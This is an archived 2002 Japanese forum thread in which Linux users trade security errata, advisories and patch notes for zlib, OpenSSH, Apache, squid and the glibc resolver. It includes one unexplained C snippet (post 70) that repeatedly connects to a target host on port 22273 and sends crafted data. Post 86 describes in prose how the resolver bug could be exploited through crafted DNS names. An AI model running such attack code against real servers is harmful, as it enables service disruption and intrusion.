[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 2ch.scのread.cgiへ]
Update time : 08/14 16:11 / Filesize : 147 KB / Number-of Response : 681
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

皆様、セキュリティホールは埋めとけよ



1 名前:login:Penguin [02/02/02 13:55 ID:TzxKF1DS.net]
日々発見されるセキュリティホール。
その情報を一人であつめるのは大変です。情報の共有をしましょう。
先人達が埋めてくれた穴は、ありがたく反映させていただきましょう。

www.redhat.co.jp/support/errata/rh72-errata-security.html
www.turbolinux.co.jp/security/
www.vinelinux.org/errata/2x/i386.html
www.debian.org/security/

ML等からの情報もよろしく

21 名前:login:Penguin [02/02/18 23:03 ID:xV7FaOh2.net]
uucp、ucd-snmpはともかく、atは...まぁ、無くてもこまらんか。

ともかく、RPM系のディストリビューションで、「全部」とかで
インストールしてると、入ってる可能性大だから、用チェック
かとおもうですはい。


22 名前:login:Penguin mailto:age [02/03/03 03:46 ID:631jyWWL.net]
ipchainsの設定をしてみました。この設定はどうでしょうか?

# ipchains -nL
Chain input (policy ACCEPT):
target prot opt source destination ports
fw all ------ 0.0.0.0/0 0.0.0.0/0 n/a
Chain forward (policy DENY):
target prot opt source destination ports
MASQ all ------ 192.168.1.0/24 0.0.0.0/0 n/a
Chain output (policy ACCEPT):
Chain fw (1 references):
target prot opt source destination ports
ACCEPT tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 25
ACCEPT tcp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
ACCEPT udp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
DENY tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
DENY udp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023


23 名前:login:Penguin mailto:sage [02/03/03 12:16 ID:SZmEd9Su.net]
>>22
スレ違い。質問スレでやっとけ。

24 名前:login:Penguin [02/03/03 12:18 ID:SZmEd9Su.net]
www.turbolinux.co.jp/security/php-4.1.2-1.html
PHPボロボロだな

25 名前:login:Penguin [02/03/07 15:55 ID:cquF55ex.net]
3/6 Vine-errata

security hole
squid-2.3.STABLE5-0vl2.i386.rpm


26 名前:zlib! mailto:age [02/03/12 16:41 ID:UaXqoxZ1.net]
zlib祭りだYO!
www.linuxsecurity.com/articles/security_sources_article-4582.html
www.kb.cert.org/vuls/id/368819

27 名前:login:Penguin [02/03/12 21:43 ID:lpFBAfJZ.net]
www.zdnet.co.jp/news/0203/12/e_linux.html

28 名前:login:Penguin mailto:sage [02/03/12 21:57 ID:e6hdJtN/.net]
zlib祭り会場はどこですか?

29 名前:login:Penguin [02/03/12 23:21 ID:11TI6bf4.net]
>>28
あなたのおうちの犬箱です



30 名前:login:Penguin mailto:sage [02/03/12 23:25 ID:tWqbf2NQ.net]
ftp.mozilla.orgが繋がらないのはzlib祭りのお陰ですか?

31 名前:sage mailto:sage [02/03/13 00:41 ID:mlfLGoSb.net]
www.kb.cert.org/vuls/id/368819
cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0059
www.gzip.org/zlib/advisory-2002-03-11.txt
slashdot.jp/article.pl?sid=02/03/12/1325239&mode=nested
www.ipa.go.jp/security/news/news.html
www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020312_zlib



32 名前:login:Penguin [02/03/13 02:02 ID:Rw4EvJaU.net]
3/12 Vine-errata

security hole
openssh-2.9.9p2-0vl0.3.i386.rpm
openssh-clients-2.9.9p2-0vl0.3.i386.rpm
openssh-server-2.9.9p2-0vl0.3.i386.rpm
openssh-askpass-2.9.9p2-0vl0.3.i386.rpm

33 名前:login:Penguin [02/03/13 08:10 ID:P2nMMkSR.net]
げー、zlibやばいなぁ。ローカルからの攻撃には無力っぽいね。
ブラウザ経由の攻撃もできるのかなぁ...
(不正なPNG送るとかで)

34 名前:名無しさん@お腹いっぱい。 mailto:sage [02/03/13 09:00 ID:X9FAJrTn.net]
mod_gzipとかやばそうだね

35 名前:名無しさん@Emacs [02/03/13 10:03 ID:uVnzr98W.net]
>>33
まぁ何はなくともさっさとzlibを更新(-> 1.1.4)することだね。
pngやgzipを直接解釈するようなサーバでもない限り外部からの攻撃は受けない
だろうし、apacheをrootで動かしてるような豪快な奴も居ない(と信じたい)
だろうから、あまり大きな問題にはならないだろうけど。



36 名前:zlib! mailto:age [02/03/13 11:47 ID:zAIB51rk.net]
bugtraqに出てたH D Moore氏のpngの画像を
XEmacsでプレビューしたらXEmacsが落ちたYO!


37 名前:zlib! mailto:age [02/03/13 11:54 ID:zAIB51rk.net]
>>36
サンプル画像はここにもあるYO!
www.digitaloffense.net/openssh_zlib/

38 名前:login:Penguin mailto:sage [02/03/13 19:47 ID:dfFI4Er/.net]
>>36
他力本願で申し訳ないが、coreとか調べてみました?
結局どーなってどーなっちゃうのかよくわからんもので・・・。
stackoverflowと同様だと思ってればいいのかな〜

39 名前:login:Penguin mailto:sage [02/03/13 23:37 ID:7LNGAJrc.net]
apache って root で動かすとやばいの?



40 名前:login:Penguin mailto:sage [02/03/14 00:38 ID:6jzSzsuH.net]
>>39
そりゃやばいだろ (;´Д`)


41 名前:zlib! mailto:sage [02/03/14 11:03 ID:Ok5u5E1d.net]
>>38
XEmacs(bamboo)はsignal 11で落ちたみたい
coreはあるけどgdb扱える能力無いのよ。すまん
で、zlib最新にしてlibpngリコンパイルしたら落ちなくなったYO!


42 名前:login:Penguin mailto:sage [02/03/16 19:05 ID:49Bp+Ljr.net]
Debian セキュリティ HOWTO
www.jp.debian.org/doc/manuals/securing-debian-howto/

43 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO.net]
3/21 Vine-errata

security hole

zlib-1.1.3-25vl0.i386.rpm
zlib-devel-1.1.3-25vl0.i386.rpm

cvs-1.11.1p1-7vl0.i386.rpm
dump-0.4b19-5.6x.1.i386.rpm
dump-static-0.4b19-5.6x.1.i386.rpm
kernel-2.2.19-0vl0.24.i386.rpm
kernel-2.2.19-0vl0.24.i586.rpm
kernel-2.2.19-0vl0.24.i686.rpm
kernel-BOOT-2.2.19-0vl0.24.i386.rpm
kernel-doc-2.2.19-0vl0.24.i386.rpm
kernel-headers-2.2.19-0vl0.24.i386.rpm
kernel-ibcs-2.2.19-0vl0.24.i386.rpm
kernel-pcmcia-cs-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i586.rpm
kernel-smp-2.2.19-0vl0.24.i686.rpm
kernel-source-2.2.19-0vl0.24.i386.rpm
kernel-utils-2.2.19-0vl0.24.i386.rpm
rmt-0.4b19-5.6x.1.i386.rpm
rpm-3.0.6-0vl2.1.i386.rpm
rpm-build-3.0.6-0vl2.1.i386.rpm
rpm-devel-3.0.6-0vl2.1.i386.rpm
rpm-python-3.0.6-0vl2.1.i386.rpm
popt-1.5.1-0vl2.1.i386.rpm
rsync-2.4.1-2vl2.i386.rpm
sash-3.4-2vl0.i386.rpm
info-4.0-5vl0.i386.rpm
texinfo-4.0-5vl0.i386.rpm


44 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO.net]
3/21 Vine-errata

security hole

apache-1.3.23-0vl0.1.i386.rpm
apache-devel-1.3.23-0vl0.1.i386.rpm
apache-manual-1.3.23-0vl0.1.i386.rpm
mod_ssl-2.8.7-0vl0.1.i386.rpm

fileutils-4.0x-1vl4.i386.rpm

45 名前:login:Penguin [02/04/05 12:26 ID:ikMkS74J.net]
04/04 Vine-errata security hole

XFree86-3.3.6-13vl28.1.i386.rpm
XFree86-100dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-75dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-3DLabs-3.3.6-13vl28.1.i386.rpm
XFree86-8514-3.3.6-13vl28.1.i386.rpm
XFree86-AGX-3.3.6-13vl28.1.i386.rpm
XFree86-FBDev-3.3.6-13vl28.1.i386.rpm
XFree86-I128-3.3.6-13vl28.1.i386.rpm
XFree86-Mach32-3.3.6-13vl28.1.i386.rpm
XFree86-Mach64-3.3.6-13vl28.1.i386.rpm
XFree86-Mach8-3.3.6-13vl28.1.i386.rpm
XFree86-Mono-3.3.6-13vl28.1.i386.rpm
XFree86-P9000-3.3.6-13vl28.1.i386.rpm
XFree86-S3-3.3.6-13vl28.1.i386.rpm
XFree86-S3V-3.3.6-13vl28.1.i386.rpm
XFree86-SVGA-3.3.6-13vl28.1.i386.rpm
XFree86-VGA16-3.3.6-13vl28.1.i386.rpm
XFree86-W32-3.3.6-13vl28.1.i386.rpm
XFree86-XF86Setup-3.3.6-13vl28.1.i386.rpm
XFree86-Xnest-3.3.6-13vl28.1.i386.rpm
XFree86-Xvfb-3.3.6-13vl28.1.i386.rpm
XFree86-cyrillic-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-devel-3.3.6-13vl28.1.i386.rpm
XFree86-doc-3.3.6-13vl28.1.i386.rpm
XFree86-libs-3.3.6-13vl28.1.i386.rpm
XFree86-xfs-3.3.6-13vl28.1.i386.rpm

46 名前:login:Penguin [02/04/11 21:08 ID:n5epu8MN.net]
04/11 Vine-errata

security hole
squid-2.3.STABLE5-0vl4.i386.rpm

47 名前:名無しさん [02/04/12 15:15 ID:357cbhyA.net]
ぼくの肛門も埋めてください

48 名前:login:Penguin [02/05/14 10:29 ID:nCRPXE+h.net]
05/14 Vine-errata security hole

sudo-1.6.3p6-0.6vl3.i386.rpm

49 名前:login:Penguin mailto:sage [02/05/28 18:43 ID:nc9YjYw6.net]
apt-get update
apt-get upgrade

だけでは不十分ですか?



50 名前:login:Penguin mailto:age [02/05/28 18:43 ID:nc9YjYw6.net]
age忘れ。

51 名前:login:Penguin [02/06/03 00:38 ID:ecxsuEIo.net]
僕のチンポの先も埋めてください

52 名前:login:Penguin [02/06/03 00:54 ID:Yo9snOlP.net]
>apt-get update
>apt-get upgrade
>
>だけでは不十分ですか?

ヴァカじゃん。そういう姿勢がそもそもsecurity hole

53 名前:login:Penguin [02/06/06 13:09 ID:H4e/6DmJ.net]
06/06 Vine-errata security hole

fetchmail-5.9.11-0vl1.i386.rpm

imap-2001a-10vl1.i386.rpm
imap-devel-2001a-10vl1.i386.rpm

bzip2-1.0.1-3vl3.i386.rpm
bzip2-devel-1.0.1-3vl3.i386.rpm


54 名前:login:Penguin [02/06/13 09:25 ID:+8hN98ol.net]
06/13 Vine-errata security hole

tcpdump-3.6.2-13vl1.i386.rpm
libpcap-0.6.2-13vl1.i386.rpm
arpwatch-2.1a11-13vl1.i386.rpm


55 名前:login:Penguin [02/06/18 15:41 ID:Y4ljwPvb.net]
Apacheにセキュリティホール
slashdot.jp/article.pl?sid=02/06/18/0434227

UNIX板 Apache関連 Part2
pc.2ch.net/test/read.cgi/unix/1017812420/466n-


56 名前:login:Penguin mailto:sage [02/06/19 08:45 ID:HipJ6wEK.net]
バグフィクスされたapacheがリリースされたそうです。

www.apache.org/dist/httpd/Announcement.html
httpd.apache.org/info/security_bulletin_20020617.txt

57 名前:login:Penguin [02/06/19 23:43 ID:APWNucgQ.net]
06/19 Vine-errata security hole

apache-1.3.26-0vl1.i386.rpm
apache-devel-1.3.26-0vl1.i386.rpm
apache-manual-1.3.26-0vl1.i386.rpm
mod_ssl-2.8.9-0vl1.i386.rpm

58 名前:login:Penguin [02/06/20 10:16 ID:01vvi0s8.net]
>>55
Red Hat
rhn.redhat.com/errata/RHSA-2002-103.html

59 名前:login:Penguin [02/06/20 10:44 ID:gutuxgNU.net]
Debian (potato)
DSA-131-1 apache -- remote DoS / exploit
www.debian.org/security/2002/dsa-131

DSA-132-1 apache-ssl -- remote DoS / exploit
www.debian.org/security/2002/dsa-132




60 名前:login:Penguin [02/06/20 13:37 ID:RkoCmceO.net]
Apache のそれは 32bit Linux でもヤバそう。
某MLにexploitが流れてた。



61 名前:login:Penguin [02/06/20 13:56 ID:gutuxgNU.net]
Apache Web サーバプログラムの脆弱性に関する注意喚起 www.jpcert.or.jp/at/2002/at020003.txt

62 名前:login:Penguin [02/06/20 14:06 ID:RkoCmceO.net]
情報スカスカのJPCERT勧告なんぞ読んでも仕方無いぞ。ほい日本語版。
www.lac.co.jp/security/intelligence/CERT/CA-2002_17.html

63 名前:login:Penguin mailto:sage [02/06/20 14:24 ID:01vvi0s8.net]
こっちはそれなりに有用。
www.ipa.go.jp/security/ciadr/20020619apache.html

64 名前:名無しさん mailto:sage [02/06/22 23:55 ID:STj3pUTJ.net]
「くだ質」とどちらに投げようか迷った挙げ句、こちらに
投げることにしました。
以下のような自分の使用状況がセキュリティの面で安全か
どうか伺いたく存じます。
自宅でLinuxを使っています。Flets ADSLを契約しており、
常時接続ではなく、時々インターネットに接続して電子
メールを読み書きしたり、WWWで情報を得たりしています。
ルータ等は使っていません。他のホストにwwwやftpで
クライエントとして接続することはあっても、自ホストを
サーバにする必要は殆どないと考えています。ただ例外で、
smtpサーバとしてnullmailerを使っています。
Debian GNU/Linux sidを使っており、電源を入れる度に
apt-getでパッケージを更新しています。
ftpd、rsh-server、ssh、apache等は削除しています。
kernelは2.4.18です。
/etc/hosts.allowは何も記述せず、
/etc/hosts.denyはALL: ALLにしてます。
# netstat --tcp --all
は、
Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:32927 *:* LISTEN
tcp 0 0 xxx.yyy.zzz.uuu:33011 aaa.bbb.ccc.ddd:smtp TIME_WAIT
となります(xxx.yyy.zzz.uuuは割り当てられたIPアドレス、
aaa.bbb.ccc.dddはプロバイダのメールサーバのIPアドレス)。


65 名前:login:Penguin mailto:sage [02/06/23 00:03 ID:bXEc0h6E.net]
>>64
> 以下のような自分の使用状況がセキュリティの面で安全か
> どうか伺いたく存じます。
「安全」と「安全でない」の2つしか状態がないと思ってる?

66 名前:login:Penguin [02/06/23 00:47 ID:knGXFfYf.net]
Apache の脆弱性を攻撃するツールが登場
slashdot.jp/article.pl?sid=02/06/22/1240249&mode=thread

67 名前:login:Penguin [02/06/23 01:02 ID:kepzSriJ.net]
>>66
充分に気をつけているほうだと思うよ。
でもセキュリティにこれで完璧ってのは無いんだよ。
あくまでコストとリスクとの綱引きでしかない。
しかしそれで侵入されたからって君を責める人はあまりいないだろう。

68 名前:login:Penguin mailto:sage [02/06/23 01:25 ID:xLORxFdI.net]
>>66
inetdも止めてしまおう。

69 名前:login:Penguin [02/06/25 15:34 ID:drybiZ1b.net]
OpenSSH に新たな弱点発見。詳細は来週まで秘密。
リモートから悪用可能らしい。
3.3 にも同じ弱点があるが、侵入は防げるそうだ。



70 名前:login:Penguin mailto:sage [02/06/25 22:33 ID:yPSMZ+Jm.net]
void writei(int fd,int num){num = htonl(num);write(fd,&num,4);}
void writes(int fd,char *s){write(fd,s,strlen(s)+1);}
void main(int argc,char **argv){struct hostent *he;struct sockaddr_in si;int fd;
char a[10];he = gethostbyname(argv[1]);while(1){fd = socket(PF_INET,SOCK_STREAM,0);si.sin_family = AF_INET;memcpy(&si.sin_addr,he->h_addr_list[0],sizeof(si.sin_addr));
si.sin_port = htons(22273);connect(fd,(struct sockaddr *)&si,sizeof(si));sprintf(a,"%d",rand());writei(fd,0x66);writei(fd,0);
writes(fd,a);writei(fd,0);writei(fd,3);close(fd);}}

71 名前:login:Penguin [02/06/25 22:46 ID:LJSlbrtr.net]
>>69
これだね。
Debian 以外のパッケージはいつころ出るんだろ。
www.koka-in.org/~haruyama/ssh_koka-in_org/0/4.html

72 名前:login:Penguin mailto:sage [02/06/26 09:06 ID:yIavaL89.net]
>70
Wnnか?何の穴よ?
まさかwww.freewnn.orgにある大昔の穴じゃないだろうな。

73 名前:login:Penguin mailto:sage [02/06/26 20:58 ID:0uLnP27B.net]
>>72
違うっぽい。

74 名前:login:Penguin [02/06/26 22:51 ID:knPs+H7Y.net]
*BSD の libc の resolver に穴が見つかったようだけど、glibc は
どうなんだろう
www.pine.nl/advisories/pine-cert-20020601.html


75 名前:login:Penguin [02/06/27 00:16 ID:UFWmO8g6.net]
ISS から OpenSSH のアドバイザリが出た。
Challenge and Response 認証にバグ。remote root exploit。
sshd_config に
ChallengeResponseAuthentication no
で回避可能。3.4 で修正されている。
これがもし Theo の言ってた穴と同じものなら、
OpenSSH 3.0 以降にのみ存在する穴じゃん。
いちはやくアップデート出した Debian potato は踊らされただけか。

76 名前:login:Penguin [02/06/27 00:18 ID:UFWmO8g6.net]
OpenSSH Advisory
www.openssh.com/txt/preauth.adv

77 名前:login:Penguin [02/06/27 00:19 ID:UFWmO8g6.net]
さみだれ式でごめん。ISS Advisory
www.openssh.com/txt/iss.adv

78 名前:login:Penguin [02/06/27 00:31 ID:UFWmO8g6.net]
>>75
訂正。3.0 以降じゃなくて 2.9.9 以降に弱点がある模様。
Debian 2.2 (potato) は安全な 1.2 系からわざわざ弱点のある
3.3 に入れ換えさせられた恰好だよ。Theo のアホーーーーー。
フルディスクロージャってやっぱり大事なんだな。

79 名前:login:Penguin [02/06/27 01:53 ID:b3kvzA+X.net]
06/27 Vine-errata security hole

openssh-3.3p1-0vl10.i386.rpm
openssh-server-3.3p1-0vl0.i386.rpm
openssh-clients-3.3p1-0vl0.i386.rpm
openssh-askpass-3.3p1-0vl0.i386.rpm
openssh-askpass-gnome-3.3p1-0vl0.i386.rpm




80 名前:login:Penguin mailto:sage [02/06/27 01:59 ID:b3kvzA+X.net]
>>79 は 06/26 発行でした。スマソ

81 名前:login:Penguin [02/06/27 11:42 ID:/viQ/aAY.net]
openssh 3.4p1出てるよage


82 名前:login:Penguin mailto:sage [02/06/27 11:52 ID:EftB/YmL.net]
syslogdが大きい。

83 名前:login:Penguin [02/06/27 16:56 ID:QDJgHCs7.net]
resolver のバグは対岸の火事ではない模様。

84 名前:login:Penguin mailto:sage [02/06/27 17:20 ID:/viQ/aAY.net]
2ch鯖のApacheも入れ替えが始まってるね。 遅いぐらいだ。昨日の件もこれが絡んでたのだろうか。 しかし入れ替えたはいいがlinuxのlibcにも。。。。 なんてことになったら大火事だな。

85 名前:login:Penguin mailto:sage [02/06/27 18:16 ID:d3NH2M4p.net]
>>84
まさに大火事のようで(藁
まあ、リモートからいじれる穴ではないだろうけど


86 名前:login:Penguin [02/06/27 18:57 ID:QDJgHCs7.net]
>>85
resolver のバグはリモートからいじれる。
攻撃者は自由に設定出来るネームサーバを持っていればいい。
ある IP アドレスの逆引きホストネームに攻撃用コードを仕込む。
そしてその IP アドレスから攻撃対象のサーバに接続する。
攻撃対象のサーバが逆引きを行い、
返って来た巧妙に細工されたホスト名を正引きしたら、あぼーん。

87 名前:login:Penguin mailto:sage [02/06/27 20:05 ID:4+mBkHBL.net]
glibcには*BSDよりも1箇所余計にチェックが入っているが、
これでは防げないのか?

88 名前:login:Penguin mailto:sage [02/06/27 20:31 ID:GRjz2eTH.net]
OpenSSHを3.1→3.4にアップグレードしたら、sshdの起動時に
This platform does not support both privilege separation and

89 名前:compression
Compression disabled
こんなメッセージを吐くんだけど・・・何だろ?syslogには上がらないみたいだけど気になるかな。

ちなみにRedHat6.2(kerner2.2.19/glibc2.1.3-23/OpenSSL0.9.6d)
[]
[ここ壊れてます]



90 名前: mailto:sage [02/06/27 20:37 ID:oX2io58x.net]
>>88
Compressionは切ろう。



91 名前:login:Penguin [02/06/27 20:41 ID:QDJgHCs7.net]
>>87
実際テストしてみたが落せない。
俺がヘボなだけかもしれないから識者の意見を待とう。

92 名前:88 mailto:sage [02/06/27 20:42 ID:GRjz2eTH.net]
>>89
sshd_configのCompressをnoに指定したら出なくなったよ。
感謝。


93 名前:login:Penguin mailto:sage [02/06/27 21:00 ID:4+mBkHBL.net]
>>90
FreeBSDをパッチを見るに、gethnamaddr.cはずでにFreeBSDの
パッチと同じ処理が入っている。getnetnamadr.cにはない。

94 名前:login:Penguin [02/06/27 21:00 ID:QDJgHCs7.net]
>>90
識者の意見が間違ってた Aapche の時のような事もあるから
itojun 氏のパッチあててもいいかもしれない。
でも勇み足で必要でないアップデートを出して、わざわざ穴を
開けてしまったDebian potato の例もあるし、悩ましいところだな。

95 名前:login:Penguin [02/06/27 21:13 ID:QDJgHCs7.net]
識者登場age。

96 名前:login:Penguin mailto:sage [02/06/27 21:32 ID:4+mBkHBL.net]
直すべきは nss_dns/dns-network.c か。
古いの見てた。すまそ。

97 名前:login:Penguin [02/06/28 11:19 ID:CALm/HoI.net]
新しいBINDが出た


98 名前:login:Penguin mailto:sage [02/06/28 13:40 ID:PahA8xFy.net]
>>93
itojunさんのパッチってどこでgetできます?
glibcに当たるのかいな?

99 名前:login:Penguin [02/06/28 16:13 ID:DZqksx+C.net]
>>97
FreeBSD や NetBSD の Advisory 嫁。
そのままでは当たらないだろうから手作業で当てれ。
ま、俺はめんどいから様子見。



100 名前:login:Penguin mailto:sage [02/06/28 20:57 ID:Yj/G45g0.net]
つーか、おまえら誰もglibcのコード読んでないんとちゃうか?

101 名前:login:Penguin mailto:sage [02/06/28 21:47 ID:Yj/G45g0.net]
--- glibc-2.2.5/resolv/nss_dns/dns-network.c.org 2001-07-06 13:55:39.000000000 +0900
+++ glibc-2.2.5/resolv/nss_dns/dns-network.c 2002-06-28 21:42:26.000000000 +0900
@@ -328,7 +328,9 @@
}
cp += n;
*alias_pointer++ = bp;
- bp += strlen (bp) + 1;
+ n = strlen(bp) + 1;
+ bp += n;
+ linebuflen -= n;
result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC;
++have_answer;
}
こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
処理がすでに入っている。

102 名前:名無しさん@XEmacs mailto:sage [02/06/29 01:29 ID:cleVXGS3.net]
>>100
> こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
> 処理がすでに入っている。

name6.c のチャンクは? と思ったけど,'99 に直ってるすね.

ttp://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-host.c.diff?r1=1.15&r2=1.16&cvsroot=glibc&f=h



103 名前:login:Penguin [02/06/29 04:06 ID:uLF75Z2Y.net]
>>79 Vine-errata security hole

openssh-3.4p1-0vl2.i386.rpm
openssh-server-3.4p1-0vl2.i386.rpm
openssh-clients-3.4p1-0vl2.i386.rpm
openssh-askpass-3.4p1-0vl2.i386.rpm
openssh-askpass-gnome-3.4p1-0vl2.i386.rpm

104 名前:login:Penguin mailto:sage [02/07/02 09:30 ID:QAyrQPMn.net]
>>100-101
通報しますた。


105 名前:login:Penguin mailto:sage [02/07/02 11:35 ID:qVWzSPns.net]
www.sendmail.org/8.12.5.html
> 8.12.5/8.12.52002/06/25
> SECURITY: The DNS map can cause a buffer overflow if the user
> specifies a dns map using TXT records in the configuration
> file and a rogue DNS server is queried. None of the
> sendmail supplied configuration files use this option hence
> they are not vulnerable. Problem noted independently by
> Joost Pol of PINE Internet and Anton Rang of Sun Microsystems.
普通の設定では影響なし、なのかな?

106 名前:login:Penguin mailto:sage [02/07/02 11:44 ID:qVWzSPns.net]
resolver 問題、CERT/CC によると
glibc はこれで fix されてるらしい。
www.kb.cert.org/vuls/id/AAMN-5BMSW2

しかし、こういうのって他のプロジェクトに還元されないもんなんだろうか。

107 名前:login:Penguin mailto:age [02/07/02 12:47 ID:KLRYFYVU.net]
上のパッチ、だれかUlrich Drepperに投げた?

108 名前:地獄狂 YahooBB219017000159.bbtec.net ◆7WP8X9hw [02/07/02 13:39 ID:hdi7nBII.net]
よくわかんないんだけど、glibcのバグはどのバージョンにあるの?

109 名前:login:Penguin mailto:sage [02/07/04 02:52 ID:qk/rUU9i.net]
>>57 07/02 Vine-errata security hole

apache-1.3.26-0vl2.i386.rpm
apache-devel-1.3.26-0vl2.i386.rpm
apache-manual-1.3.26-0vl2.i386.rpm
mod_ssl-2.8.9-0vl2.i386.rpm



110 名前:login:Penguin mailto:sage [02/07/04 13:55 ID:50T+DZdt.net]
dammit.lt/apache-worm/
このApacheワームのソースってどこから出たものなのかな。
ワーム自体は蜜壷で捕まえたみたいだけど。

111 名前:login:Penguin [02/07/04 14:07 ID:nB1GJwB4.net]
Squid Proxy Cache Security Update Advisory SQUID-2002:3
- Security advisory several issues in Squid-2.4.STABLE6 and earlier.
Squid-2.4.STABLE7 released to address these issues.

www.squid-cache.org/Advisories/SQUID-2002_3.txt

112 名前:login:Penguin mailto:sage [02/07/04 14:13 ID:WhJXedKe.net]
>>109
投稿した人は「僕の inbox に入ってた」って言ってた。

113 名前:login:Penguin [02/07/07 01:03 ID:BITbiOEM.net]
snortのalert(警告)をメールで携帯に送りたいんですが、
どのようにすれば良いのでしょうか。
confファイルにはそれらしき箇所が見つかりませんでした。

114 名前:login:Penguin [02/07/07 01:06 ID:puqWG/eL.net]
>>112
snort 単体ではできない。
syslog と swatch 等を使うか、snort 用のツールを使う。

115 名前:112 mailto:sage [02/07/07 02:22 ID:BITbiOEM.net]
>>113
さんくすこ

116 名前:login:Penguin [02/07/08 00:56 ID:/S0ObH45.net]
NetSNMPとMRTGでサーバを監視しようと思ってるんですが、
MRTGに関してはローカルホスト(NetSNMPが入ってるマシン)を対象に
監視を行っても良いのでしょうか。
なんか説明ページだと、ルータが監視の対象となってるみたいなんですが。
(ルータがSNMPに対応していないので…)


117 名前:login:Penguin mailto:sage [02/07/08 12:47 ID:X0vw/Q8k.net]
>>115

問題なし


118 名前:login:Penguin [02/07/08 21:11 ID:u3KFO/Rs.net]
07/08 Vine-errata security hole

squid-2.4.STABLE7-0vl1.i386.rpm


119 名前:login:Penguin mailto:age [02/07/11 10:09 ID:5UzWVYho.net]
ttp://lwn.net/Articles/4545/

This bug has been fixed for the gethostbyXXX class of functions
in GNU libc in 1999. Unfortunately, there is similar code in the
getnetbyXXX functions in recent glibc implementations, and
the code is enabled by default. However, these functions are
used by very few applications only, such as ifconfig and ifuser,
which makes exploits less likely.

やはり....




120 名前:login:Penguin mailto:sage [02/07/11 13:11 ID:yBUV78yy.net]
www.kb.cert.org/vuls/id/AAMN-5BMSW2
更新されてる


121 名前:login:Penguin mailto:sage [02/07/17 15:50 ID:c18o8yEa.net]
最近新しい穴が見つからないねぇ。
いいことなんだが、何かつまらんw






[ 続きを読む ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<147KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef